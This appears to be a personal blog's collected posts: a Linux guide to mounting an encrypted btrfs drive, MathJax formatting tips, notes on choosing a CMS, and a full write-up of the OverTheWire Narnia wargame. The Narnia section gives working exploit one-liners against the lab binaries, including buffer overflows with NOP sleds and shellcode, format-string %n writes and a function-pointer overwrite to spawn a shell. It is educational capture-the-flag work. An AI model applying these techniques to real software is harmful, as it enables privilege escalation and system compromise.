Simplest way to do this is to load a live CD with a distro of your choice (I am using an arch-based distro here).

On terminal identify drives using lsblk. All my data is in the nvme0n1 drive, with the large 2tb partition on nvme0n1p2 and the 4 gig partition on nvme0n1p1. You can tell because it’s the biggest one here.

[liveuser@CachyOS ~]$ lsblk
NAME        MAJ:MIN RM  SIZE RO TYPE MOUNTPOINTS
loop0         7:0    0  2.7G  1 loop /run/archiso/airootfs
sda           8:0    1 57.8G  0 disk
├─sda1        8:1    1 57.7G  0 part
│ ├─ventoy  253:0    0  2.9G  1 dm
│ └─sda1    253:1    0 57.7G  0 dm
└─sda2        8:2    1   32M  0 part
zram0       252:0    0 30.9G  0 disk [SWAP]
nvme0n1     259:0    0  1.9T  0 disk
├─nvme0n1p1 259:1    0  4.1G  0 part
└─nvme0n1p2 259:2    0  1.9T  0 part

I need to mount nvme0n1p2 as /mnt and then mount nvme0n1p1 inside it, as /mnt/boot ( sometimes it might be /mnt/boot/efi or /mnt/efi depending on how the distro installs it, but it’s rare and sometimes not very important).

If i was using a normal formatted drive (such as ext4) it would go like this:

[liveuser@CachyOS ~]$ sudo mount /dev/nvme0n1p2 /mnt
[liveuser@CachyOS ~]$ sudo mount /dev/nvme0n1p1 /mnt/boot

However, mine is formatted using btrfs and is LUKS-encrypted, so there’s a few more steps before I can mount nvme0n1p2.

First I need to decrypt the drive:

[liveuser@CachyOS ~]$ sudo cryptsetup luksOpen /dev/nvme0n1p2 cryptid
Enter passphrase for /dev/nvme0n1p2:

This then places a decrpyted version of the volume inside /dev/mapper/cryptid, in place of the nvme0n1p2. However I can’t mount this directly as btrfs stores data inside subvolumes. All you really need to know is that the subvolume “@” contains the whole drive. So we mount that:

[liveuser@CachyOS ~]$ sudo mount /dev/mapper/cryptid /mnt -o subvol=@
[liveuser@CachyOS ~]$ sudo mount /dev/nvme0n1p1 /mnt/boot

And there we go! You can now run the drive using arch-chroot or something similar, and run the magic commands as needed.

I have spent a few days getting this site ready for public viewing, so I had to finish up the home and about pages. I’m going to catch up for future posts, and I have some ideas lined up:

• Planning to resume my porting of my old OverTheWire writeups

• I’m going to port over & update my QEMU virtual machine guide when I get it running again, so that I can keep things organized for other computers.

• I might talk about some projects I made with CTP

In addition to some site updates that I’ll get on:

• Improve my assets page for better organization

• Some kind of view/like counter

• A secret page???

Resources

Showing this first because it’s probably the first thing you’d want to check out before you scroll further.

• MathJax Basic Tutorial and Quick Reference Sheet - The de-facto thread that contains almost everything you need to know, divided by topic. It’s extensive and very long.
• Detexify - I found this site from the aforementioned thread, and it’s pretty neat. Lets you draw a symbol so that you can get the Mathjax operation for it.
• LaTeX Mathematical Symbols - Contains most of the commonly used symbols and functions
• Easy Copy MathJax - A list of common single & multi-line equations that you can easily copy & paste, based on topic. I found this useful especially with the matrix section.

Formatting

I provide source code, but you can also right click on an equation to get the functions as well.

$ a^2 = C_1cos(wt) \rightarrow sin(a)^2_5 $ is a^2 = C_1cos(wt) \rightarrow sin(a)^2_5

$\sum_{i=1}^{n} $ is \sum_{i=1}^{n}

$\frac{x}{y}$ is \frac{x}{y}

$\underrightarrow{R_1 \leftrightarrow R_2}$ for arrows under equations: $\underrightarrow{R_1 \leftrightarrow R_2}$

\\\\ starts a new line.

Putting square brackets after \\\\ adds spacing between lines: \\\\[10px]

\hspace{10px} adds spacing inside lines, useful for left/right aligning.

Here is all of it combined:

a^2 + b^2 \hspace{10cm}  \\[20px]
c^2 \hspace{5cm} +d^3

You can use \left and \right to put brackets to scale an equation:

S = \left\{ \begin{bmatrix}
x\\
2x+1
\end{bmatrix} \mid x \text{ is a real number} \right\}

Common equations

Cases:

\begin{cases}
x_1+2x_2-3x_3 = -4 \\
x_1+4x_2-2x_3 = 6 \\
3x_1 -2x_2+2x_3=8
\end{cases}

Matrices:

\begin{bmatrix}
3 & -2 & 4 \\
-2 & 5 & -6 \\
0 & 2 & 7
\end{bmatrix}

Replace bmatrix with vmatrix for vertical matrices:

You can also make this using the standard array, using left and right operators. This is useful if you want a formatting like an augmented matrix:

\left[
\begin{array}{cc|c}
  1&2&3\\
  0&0&-6\\
  0&4&4\\
\end{array}
\right|

Tables:

\begin{array}{r|lll}
 & x & y & \text{Available} \\
\hline
\text{Time} & 12 & 3 & 120 \\
\text{Cost} & 0.2 & 0.4 & 4 \\
\text{Profit} & 2 & 1 & 
\end{array}

Narnia helped me learn and understand more about how code works at a binary level, especially with how I could use vulnerabilities in machine code and C code/functions in order to gain higher access, and how I could prevent these issues from happening in my own code.

Previously, my only experience in binary (exploitation) came through computer architecture classes that I took during college, however they mostly dealt with MIPS assembly instead of x86, and relied on illustrations & diagrams. They somewhat helped me with solving these problems, but for the most part, I had to spend the majority of my time researching on my own (and with guidance from some people @ OTW). Nevertheless, it’s been a blast solving all of these levels.

Introduction

As usual, we will be using the SSH command ssh narnia[LVL]@narnia.labs.overthewire.org -p 2226 for this wargame. There won’t be anything on the home folders, instead everything we need to access is in the /narnia/ directory, which includes all the executables and source code. Assume that we are working on that directory.

All passwords will be located on /etc/narnia_pass/narnia[LVL]. Each level/user only has access to their own password file, but the executables have an SUID bit that will let us run them as the next level, so we can get the passwords ourselves when we gain access to the shell.

Level 0

To start this level, we can look at the source code on narnia0.c:

...
int main(){
    long val=0x41414141;
    char buf[20];

    printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
    printf("Here is your chance: ");
    scanf("%24s",&buf);

    printf("buf: %s\n",buf);
    printf("val: 0x%08x\n",val);

    if(val==0xdeadbeef){
        setreuid(geteuid(),geteuid());
        system("/bin/sh");
    }
    else {
        printf("WAY OFF!!!!\n");
        exit(1);
    }
    ...

There’s a few things that I’ve noticed from this code:

1. The scanf function parses the first 24 characters of the input, but buf is only 20 bits in size.
2. We have to change val to hex 0xdeadbeef to access the shell as narnia1.
3. val doesn’t get changed directly.

The only way we can change the value is by changing the buffer beyond the 20 bytes it’s allocated towards. Since buffer is 20 bytes and the input allows us to write up to 24, we can write past the buffer in order to change the bytes allocated towards val. This is commonly known as a buffer overflow attack. You can see this for yourself by using an input with size 21, as the value changes to something other than 0x41414141.

We can do this by filling the first 20 letters with any random value, then filling the last 4 bytes with 0xdeadbeef. Note that because this is an x86 machine, bits are little-endian, so we have to reverse our byte order for those 4 bytes. This is as simple as separating it into 0xef, 0xbe, 0xad, then 0xde.

I wrote a C program that will simply print out the input for us. I placed it on /tmp/ then compiled it as /tmp/prog. This is just one method on how we can print out the bytes, and I’ll occasionally switch how I solve the levels.

#include <stdio.h>
int main() {
    for (int i = 0; i < 5; i++) {
        printf("hell");
    }
    putchar(0xef);
    putchar(0xbe);
    putchar(0xad);
    putchar(0xde);

    return 0;
}

I ran this by running my program then piping it with narnia/narnia0. While this changed the value correctly, I found an issue where it exits immediatly before I could use the shell. I circumvented this by running cat alongside my compiled program. Something like (/tmp/prog; cat) | /narnia/narnia0.

Once you get an empty line, you are free to enter any command and get the password to the next level.

Level 1

At narnia1.c we have this:

...
int main(){
    int (*ret)();

    if(getenv("EGG")==NULL){
        printf("Give me something to execute at the env-variable EGG\n");
        exit(1);
    }

    printf("Trying to execute EGG!\n");
    ret = getenv("EGG");
    ret();
    ...

The program reads an environment variable that we are supposed to save using the export command.

However I noticed that the EGG variable is directly setting the function ret. This means we have to give it some kind of code that will make it run on the program directly. Obviously, plaintext C code will not work.

I found out about something called shellcode, which is basically a just a set of assembly instructions that allow us to run arbritary code. There’s a bunch of random shellcode samples from the internet, such as this list from Shell-storm, and the code that I’ve found working for this level is this one, since it is for linux x86 systems and it will run the shell at the currect user ID. You can parse this as one line if you want to.

Once we set the variable with export EGG=`echo -e "\x6a\x0b\x58\..."`, we can run the program and get the shell as narnia2!

Level 2

...
int main(int argc, char * argv[]){
    char buf[128];

    if(argc == 1){
        printf("Usage: %s argument\n", argv[0]);
        exit(1);
    }
    strcpy(buf,argv[1]);
    printf("%s", buf);
    ...

This one seems similar with level 0, with a potential buffer overflow attack on the buf array. I know that the strcpy() function is prone to vulnerabilities as it will copy strings without checking sizes. We can input a string as large as we can, but if it is greater than 128 characters, it will still keep writing to buf. However, there’s no ordinary variable after it that we can overwrite.

As a test, I ran the program with various string sizes. I have noticed that, with a string of 132 characters, the program segfaults.

From what I can understand about assembly, after we go past the main() variables (which are the 128 chars in the array), the 4 bytes after that hold some kind of frame pointer or padding (which aren’t immediately or fully used, hence the program not crashing on 131 chars), and the 4 bytes right after hold the return address. The return address will be useful here because it’ll tell the program where to jump in memory after executing main. So in total, we need to have 136 characters in our input argument.

However, before we get there, we need to figure out what our payload will be for the first 132 bytes. I decided to use the same shellcode from the previous level, which is 33 bytes. The rest of the space (99 bytes) will be placed on the front of the input, and it will consist of no-operation instructions (0x90 in hex). NOP will basically just skip to the next byte/instruction in assembly without doing anything. That way, we will have space to put our return address in, and it will allow the shellcode to run smoothly.

To find the last 4 bytes for our return memory address, we need to use a debug program like GDB and look at it’s memory when the program crashes. I did this by running gdb ./narnia , then when the gdb prompt opens up, we can run the program using r `python3 -c "print (132*'q')"`. When the program crashes, we can see the memory past the stack pointer by doing x/100xw $esp.

You should keep pressing enter until you find the correct part of memory, which you can tell by seeing a blob of the same hex values (in particular, 0x71 as it is the hex code for the letter q). The address closest to the middle should be the return address, to give it a good enough range so we can re-run the program. I chose 0xffffd540. Just like in the first level, the characters will be in reverse order.

Now that we have all the parts needed, we can put it together in one line like so:

./narnia2 `python3 -c "import os; os.write(1, b'\x90'*99 + b'\x6a...\x80' + b'\x40\xd5\xff\xff')"`

Level 3

...
int main(int argc, char **argv){
    int  ifd,  ofd;
    char ofile[16] = "/dev/null";
    char ifile[32];
    char buf[32];

    if(argc != 2){
        printf("usage, %s file, will send contents of file 2 /dev/null\n",argv[0]); exit(-1);}

    /* open files */
    strcpy(ifile, argv[1]);
    if((ofd = open(ofile,O_RDWR)) < 0 ){
        printf("error opening %s\n", ofile); exit(-1); }
    if((ifd = open(ifile, O_RDONLY)) < 0 ){
        printf("error opening %s\n", ifile); exit(-1); }

    /* copy from file1 to file2 */
    read(ifd, buf, sizeof(buf)-1);
    write(ofd,buf, sizeof(buf)-1);
    printf("copied contents of %s to a safer place... (%s)\n",ifile,ofile);
    ...

In this level we have to manage files by giving it a file to read from ifile, which will then send it to the file ofile. Immediatly I can see that we can set both ofile and ifile by a buffer overflow, since the input relies on the strcpy() function, though both files need to be valid. The buffer array is not that important as it just copies the contents of the input file to it, but there is a size limit of 32 bytes (which isn’t really important for us).

As a test, I ran the program with various input sizes to see if the error messages change.

At less than 32 characters, it will print out the input file it fails to access. At 32 or more, however, it will print out the failed output file, since it overwrites the /dev/null it was set to by default.

However, there is another caveat with doing a buffer overflow on two strings like this. Since strings in C are null-terminated (they end as soon as a 0x00 character is found), the actual filename put into ifile will keep going past ofile, including it in the end of it’s string. So that means we have to somewhat share filenames with the two.

I decided to create a subdirectory on /tmp/, with a name that is 32 minus 5 characters long, because it’s the best way we can create two files with the same name, which we can use for both the input file and output file.

In the subdirectory, I created another subdirectory called tmp so that it can be compatible with our output. In order to make our exploit work, I would need to create a symlink inside it that points to the actual narnia4 password file using ln -s. This will be our input file.

For our output file, we can create an empty file on /tmp/ that is named the same as the input file.

With our two files ready, we can now run the executable, using the full directory path of the input file. This will then read the password of narnia4 and write it to the output file. Cat it and you’ve got your password.

Level 4

...
extern char **environ;

int main(int argc,char **argv){
    int i;
    char buffer[256];

    for(i = 0; environ[i] != NULL; i++)
        memset(environ[i], '\0', strlen(environ[i]));

    if(argc>1)
        strcpy(buffer,argv[1]);
    ...

This is very similar to Level 2, in which we have a buffer that strcpy() writes to, and there isn’t really anything meaningful happening in the program itself. Instead of 128 bytes, we have 260 bytes (256 chars + 1 int) to work with, which means the input in total would need to be 268 characters long.

The process to solving this is the exact same as Level 2, down to the same commands. You would just need to change the amount of NOP instructions to 231. You might not need to change the return address, as the doubling of space would make it easier to not segfault.

Level 5

int main(int argc, char **argv){
        int i = 1;
        char buffer[64];

        snprintf(buffer, sizeof buffer, argv[1]);
        buffer[sizeof (buffer) - 1] = 0;
        printf("Change i's value from 1 -> 500. ");

        if(i==500){
                printf("GOOD\n");
        setreuid(geteuid(),geteuid());
                system("/bin/sh");
        }

        printf("No way...let me give you a hint!\n");
        printf("buffer : [%s] (%d)\n", buffer, strlen(buffer));
        printf ("i = %d (%p)\n", i, &i);
        ...

The program wants us to change i to 500 in order to get into the shell. Unlike the previous levels, we cannot use buffer overflow here, because it uses snprintf() which takes account of the size of the buffer array, and the last character in our input is removed. This means that, no matter how big your imput is, it will only write the first 63 characters.

Another thing I noticed is that it gives you a hint if you get it wrong. It only prints our what you put in the buffer, the string length, and the value and memory address of i. I wasn’t sure what to do with these values, but then I realized they were trying to hint us about the format strings themselves. Perhaps a potential format string vulnerability?

Since snprintf is a print function that support format strings, we can supply it with any format specifier that we would normally use in a print function in C. The vulnurability here comes from how it lets us provide the string directly from our input. You can test it yourself by adding something like %p in your input, and it’ll provide a hex representation of whatever’s in memory near the stack.

This will be tricky though since we can’t directly give the parameters. Without them, it seems that format strings will just read directly from the next 4 bytes in the stack memory. Luckily for us, the snprintf() function handling it comes right after the buffer array, where our input gets placed. So in theory, we can set our parameters for our format strings, by setting 4+ characters at the front.

You can test this out by doing something like ./narnia5 "AAAABBBBCCCC %x %x %x". Doing this will print the hex representations of the 12 starting characters.

While this is useful for getting info out of the stack, what we want to do is write info, not read it. Funnily enough, the program already gives us the memory address of i, so we just need to write it down. In my case, it is 0xffffd390, but be warned that it may change occasionally.

I found a few things that could be useful:

• You can “pad” format specifiers by adding a number after the % symbol, which will give them a minimum length. For example, %5d will print an integer, but it will pad out the front with empty spaces if the number is less than 5 digits.
• There is actually at least one format specificer that WRITES to memory instead of reading it. %n does not print anything, but if given a pointer, it will write to it the length of the string that the print function has finished parsing so far. For some reason, it does not stop when it cannot write anymore.

Because of these, we can write the value of 500 to i. To do this we only need to use the specifiers %d (or anything that reads 4 bytes) and %n. The %d will help us use the padding format in order to get a string that is 500 characters, and the %n will write that length at the very end. The two of these will need 8 bytes at the start of the input, so the padding will be %492d.

As for the 8 bytes, the first 4 can just be any random junk value. The next 4 will be the memory address for i that we got previously, in little endian format of course.

Once we put that together, we can get our input string that’s small enough to work.

./narnia5 `echo -e "test\x90\xd3\xff\xff%492d%n"`

Level 6

...
extern char **environ;

unsigned long get_sp(void) {
       __asm__("movl %esp,%eax\n\t"
               "and $0xff000000, %eax");
}
int main(int argc, char *argv[]){
        char b1[8], b2[8];
        int  (*fp)(char *)=(int(*)(char *))&puts, i;

        if(argc!=3){ printf("%s b1 b2\n", argv[0]); exit(-1); }

        /* clear environ */
        for(i=0; environ[i] != NULL; i++)
                memset(environ[i], '\0', strlen(environ[i]));
        /* clear argz    */
        for(i=3; argv[i] != NULL; i++)
                memset(argv[i], '\0', strlen(argv[i]));

        strcpy(b1,argv[1]);
        strcpy(b2,argv[2]);
        //if(((unsigned long)fp & 0xff000000) == 0xff000000)
        if(((unsigned long)fp & 0xff000000) == get_sp())
                exit(-1);
        setreuid(geteuid(),geteuid());
    fp(b1);
    ...

Breaking down the code, we can see:

1. The code wants 2 arguments, and uses strcpy() to put them into two 8-character arrays. This means we can buffer overflow here.
2. It clears environment variables and extra arguments, but I suspect this is only here to prevent unintended solutions or server attacks.
3. The program exits early if fp points to somewhere at the top of the stack. Since it runs without error, that means that it gets called to somewhere far below the memory.
4. fp(b1) is called. Apparantly it is used as a function pointer, and currently only runs puts(b1), so it only prints the first argument.

We cannot use a shellcode attack like the ones we used in previous levels. This is because we have fewer bytes to store info on, and the program will not let us run code that is on stack memory.

At first glance, it seems that you cannot write over the function pointer fp because it is declared right after b1 and b2, which mean that a buffer overflow wouldn’t change it’s value. However, it turns out that fp on the stack is actually right below b1, so we are able to overwrite it by overflowing that char array. I was able to confirm this by running this C code:

#include <stdio.h>

int main(){
    char b1[8], b2[8];
    int  (*fp)(char *)=(int(*)(char *))&puts, i;

    printf("Addr b1: %p\n", (void *)b1);
    printf("Addr b2: %p\n", (void *)b2);
    printf("Addr fp: %p\n", (void *)&fp);
    printf("Addr i:  %p\n", (void *)&i);
}

Reading the addresses confirms that the stack memory goes like this, from lowest to highest: i <- fp <- b1 <- b2. I’m not sure why this is, but my guess is some kind of compiler optimization involving arrays.

Anyways, how are we supposed to replace fp? Since it’s pointing to an existing function puts(), we can possibly try to replace it with another library function that could give us shell access, and with input that is 8 characters or smaller. Luckily, the program includes the <stdlib.h> library, which includes the system() function to run any command, including the shell.

We can use GDB to easily find the memory locations to standard library functions. We can do gdb ./narnia6, run the program (to load up the libraries), then use the print command to get the memory address of the function: p system. In my case, it was displayed in blue font as 0xf7dce450. As you can notice, it does not end in 0xff so it will not exit early.

Now that we have that, we need to overflow two arguments in order to run our exploit. The first one, which overflows b1, will be used to overwrite fp with the memory address of system() that we just obtained. The second argument will overflow b2 to overwrite b1 with /bin/sh to run the shell. Unfortunately we can’t do this in one argument because of null character issues.

Since each buffer is only 8 bytes long, we just need an 8-letter word to overflow both with…

./narnia6 `echo -e "deadbeef\x50\xe4\xdc\xf7"` deadbeef/bin/sh

Level 7

...
int vuln(const char *format){
        char buffer[128];
        int (*ptrf)();

        memset(buffer, 0, sizeof(buffer));
        printf("goodfunction() = %p\n", goodfunction);
        printf("hackedfunction() = %p\n\n", hackedfunction);

        ptrf = goodfunction;
        printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf);

        printf("I guess you want to come to the hackedfunction...\n");
        sleep(2);
        ptrf = goodfunction;

        snprintf(buffer, sizeof buffer, format);

        return ptrf();
}

int main(int argc, char **argv){
        if (argc <= 1){
                fprintf(stderr, "Usage: %s <buffer>\n", argv[0]);
                exit(-1);
        }
        exit(vuln(argv[1]));
}

int goodfunction(){
        printf("Welcome to the goodfunction, but i said the Hackedfunction..\n");
        fflush(stdout);

        return 0;
}

int hackedfunction(){
        printf("Way to go!!!!");
            fflush(stdout);
        setreuid(geteuid(),geteuid());
        system("/bin/sh");

        return 0;
}

Wow that’s probably the longest code we’ve seen here so far.

This program will run goodfunction() and does nothing with our input, except placing it in an array with the snprintf() function. We need to instead be able to run hackedfunction(). It also outputs the memory addresses of both functions, as well as the address and value of ptrf, the function pointer being called.

Previously we used snprintf() to run a format string attack in Level 5. We can use the same idea in order to change the value of ptrf to the memory address of the hacked function, so we will be able to run it. We already have its memory address at 0xffffd2c8, and the value to change it to is 0x804930f (134517519).

We can use the same method we discussed on level 5. However, I’ve had to refine my format string a few times in order to stop segfaults, and eventually I removed the junk values on the first 4 letters in order for it to work. So our final input looks something like \xc8\xd2\xff\xff%134517515d%n. I’m not entirely sure why this was necessary here, but not on level 5.

Intriguing how the two levels have somewhat unique solutions for writing to memory, despite being so similar. Format strings just get weirder and weirder.

Level 8

...
int i;

void func(char *b){
        char *blah=b;
        char bok[20];
        //int i=0;

        memset(bok, '\0', sizeof(bok));
        for(i=0; blah[i] != '\0'; i++)
                bok[i]=blah[i];

        printf("%s\n",bok);
}

int main(int argc, char **argv){
        if(argc > 1)
                func(argv[1]);
        else
        printf("%s argument\n", argv[0]);

        return 0;
}

The function func() will write to the bok array by traversing the entire string we provide in the argument. This means we can do a buffer overflow attack, possibly by supplying the shellcode we’ve used in previous levels and overwriting the return address.

However there is one caveat- if we overflow bok, it will overwrite the pointer blah, which will make the function copy from a random area in memory instead of our input. So we need a way to re-supply that memory address.

To do this, we need to examine the stack memory when func() is being called, and see the values of the two variables. I ran GDB with the executable, then set up a breakpoint near the end before the stack pointer goes back to main. This will pause the program when we run it so that we can examine it in-place.

Run disass func to visualize the assembly code, then b *func+<NUM> to set the breakpoint. I set it to 110.

With that set up, we can test the program with input of various length. Here’s one that I ran with r hello, then got the memory by doing x/16xw $esp:

I’ve highlighted above the values for our input that is held by blah. You can tell by the trail of zeroes that were memsetted beforehand. We do not need to worry about the 2nd value, but it can be useful for debugging. As you might notice, the value changes depending on how long our argument is, so we need to decrease it as we add more letters to it.

With 5 letters our value is 0xffffd577. With 20, we would have to decrease the last digits to 0x68. And if we want to actually set the pointer, it would then be 0x64. We can confirm this by checking the memory being written and if the two memory values match (refer to the previous image), as there’s no valuable hints being shown by the print statement.

Here’s some statments that worked for me:

r `echo -e "hellohellohellohello\x64\xd5\xff\xff"`
r `echo -e "hellohellohellohello\x60\xd5\xff\xffAAAA"`
r `echo -e "hellohellohellohello\x5c\xd5\xff\xffAAAABBBB"`

Now if we account that for the 33-byte shellcode, it would be r `echo -e "hellohellohellohello\x3b\xd5\xff\xffAAAABBBB"`

The AAAA here previously held our frame pointer, which isn’t useful to us, so we can put any random value on it. The BBBB will be replaced by our own return address. Since we’re providing the shellcode in our argument, we need to get the address that goes directly to it. Luckily, we have our pointer value right here, so we can just push it 32(0x20) letters forward. That would make our return address as 0xffffd55b.

And finally, we can append the entire shellcode to the back of our input. This isn’t entirely safe because it relies on overwriting random memory values that the program might use, but I wouldn’t care in this situation. Our command would then be r `echo -e "hellohellohellohello\x3b\xd5\xff\xffAAAA\x5b\xd5\xff\xff\x6a...\x80"`.

If we run it, we will be able to get the shell, however GDB is preventing us from accessing as the next user. We need to exit it and… damn. We need to re-calculate the memory values again. To do this we can use the xxd command to examine the values that get printed out if we overflow the buffer to 20 characters:

Great, we’ve got the address at 0xffffd581. Now we’d need to adjust it and the return address to the rest of our input size. You can do this part yourself :)

Level 9

There’s nothing to do here for now.

We’ve finished Narnia! Thanks for reading my writeup. Next stop: possibly Vortex or Manpage?

Of course, I could always do things the manual way, by manually setting the filename, headers, and writing all the markdown in plain text. But that requires some tedious work, and could end up with mistakes or inconsistencies (though I sometimes still have to do this, more on that later).

Then I’ve heard about how you could reduce the tediousness through a content management system (CMS). Basically a way for me to create and edit posts through a fancy GUI instead of having to stare at a text editor the entire time.

In order to choose one however, I had some requirements in mind:

1. Doesn’t require me to host my site anywhere else - Github pages is already good enough.
2. Doesn’t require me to make new accounts IF the only use of the account is to run the CMS (so stuff like Netlify and Cloudflare is fine).
3. Isn’t paid or doesn’t have a horrible rate limit for free users.
4. Can be run locally. Being able to use it online is nice, but not really needed.
5. Isn’t outdated, hasn’t gotten updates in the past year.

This has eliminated about 90% of CMS that I have found online. I have tested out the ones that fit, with varying degrees of failure and success.

CMS 1. TinaCMS

I have first heard of this CMS from this site’s theme author, but that was back when it was still called Forestry.io. I liked the documentation and was hoping to use the special visual editing feature they offered inside the CMS.

However, I have faced some issues when using it. One being that the visual editing feature never worked properly for me, which I’m pretty sure was either a config issue or was never fully compatible.

Also, I faced issues with creating new posts - more specifically, setting the file name and the yaml headers properly. One example is setting the layout element to be “post” by default, while also hiding it from the tina UI. I expect this to always put “post” on all new posts, but instead it just doesn’t put the layout at all. Any other way to circumvent this would require me to input it myself anyway. Another example is with setting the date, which would always post the full datetime format, no matter what options I put.

I decided that there’s no point in using a CMS like this if it required that much manual intervention. It just wasn’t a use case for me.

CMS 2. Decap CMS

I’ve seen how much Decap/Netlify CMS gets mentioned every time I research this topic, meaning that it must be one of the more popular choices. I decided to try it out.

Surprisingly it is very simple. They provide the files, and the config does not take that many lines to write unlike Tina.

However, the issue came when trying to test the CMS locally. I could not do that, as I needed to connect to a backend in order to save any changes. One of the main options given was called Netlify Identity, however that required me to host my website to Netlify which I do not want to do. Another option was to authenticate using a Github account, but I couldn’t figure out how to do this past making an OAuth app.

I feel like Decap would’ve been a solid choice, if they made it easier to use it outside of Netlify. The documentation regarding this is sparse, and I would have to figure things on my own.

CMS 3. Sveltia CMS (currently using)

I found out about Sveltia CMS as a drop-in replacement for Decap. Literally all I needed to do was replace a single line containing the javascript.

The experience has been much better simply because I was able to finally use it. It runs locally with a Chromium-based browser, so I could easily test if things work properly without pushing to github.

I also managed to get it to authenticate with a Github account, using Sveltia’s own CMS Authenticator. This required me to host the auth server on Cloudflare myself. I followed the guide exactly as provided except for step 2, because I had to make a Github application instead of a standard OAuth app. The process is mainly the same, with the extra caveat being the permissions. Just set read and write permissions to “Content” in Repository Permissions.

The search is still ongoing

While I mentioned using Sveltia CMS, it is very far from perfect. My favorite part is the media manager, which allows me to upload & download files on different directories, even if they are subdirectories of each other. This means i can edit my assets/ folder and assets/posts/ folders separately.

However, my least favorite part is the post editor. It is a very basic markdown editor with no special features. Code blocks do not show syntax highlighting, no matter what language I put on them. LaTeX/MathJax does not display at all. Also, Liquid and HTML (which Jekyll supports) does not get processed, which is expected but annoying if i wanted to edit the main pages.

Because of this, I am still looking for better ways to manage my content in this site. I might need to find a way to modify Sveltia, switch to a different CMS, or perhaps develop my own solution. In any case, if anyone has any suggestions, feel free to share it!

If you do not know, Mathjax is basically used to display $\LaTeX$ equations in Markdown, websites, or anything that supports javascript. It came really useful when writing notes for most of my math classes, especially with markdown editors such as MarkText.

Adding the script itself is simple, it’s just a one-liner into my external javascript file:

<script src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js"></script>

However it doesn’t exactly work as I expected it to out-of-the-box, as using the $ and $$ syntaxes did not work. It turns out that by default it uses a completely different syntax, but I can actually customize this behavior by adding a script before it:

<script>
window.MathJax = {
    tex: {
        inlineMath: [['\\(','\\)'], ['$', '$']],
        displayMath: [['\\[','\\]'], ['$$','$$']],
    },
    options: {
        skipHtmlTags: ['script', 'noscript', 'style', 'textarea', 'pre']
    }
};
</script>

The skipHtmlTags help make sure that Mathjax doesn’t mess up with other parts of the site, like code blocks and whatnot.

Here’s a test with an inline equation: $ x^2 + y^2 = z^2 $

Some equations on display blocks:

There is one issue however, which is that multi-line math blocks do not work (with \\\\). The SSE here should be in two lines.

I think the only way to circumvent this issue is by encasing it in a function, I chose to do it with \begin{align*}

Aside from that, horizontal spacing (\hspace{20cm}) and vertical spacing \\\\[1cm] seem to work fine.

Additionally, I found this CSS rule which allows you to move the equations to the left instead of it being centered.

mjx-container[display="true"] {
  justify-content: flex-start !important;
  text-align: left !important;
}

References:

• LaTeX Math Magic
• Add Mathjax Support to Jekyll and Hugo

I’ve finally decided to make use of this domain I grabbed, by making a personal website with it.

I decided to use Jekyll for this, but I am honestly a complete noob in terms of website styling + customization so I wanted to use a pre-made site to start off with.

I’ve looked at several themes, such as the Moonrise theme and the Klise theme, which are all awesome by their own right. However I eventually decided to base it off Pixyzehn’s personal website. I thought that it was closest to my use case, and was simple enough for me to customize and make changes.

Here’s a small list of things that I hope to eventually implement for this website:

• Overhaul the styling of this website, such as changing color scheme or centering
• Separate home and about pages
• Add a portfolio page?
• Add comments on posts, possibly using Github comments.
• Mathjax integration, because I want to be able to put fun math equations here
• A public directory (This already exists, but it should be more stylized.)
• Port some of my existing writeups, guides, and notes.
• Talk about my own work!

Anyways.. Thank you for visiting!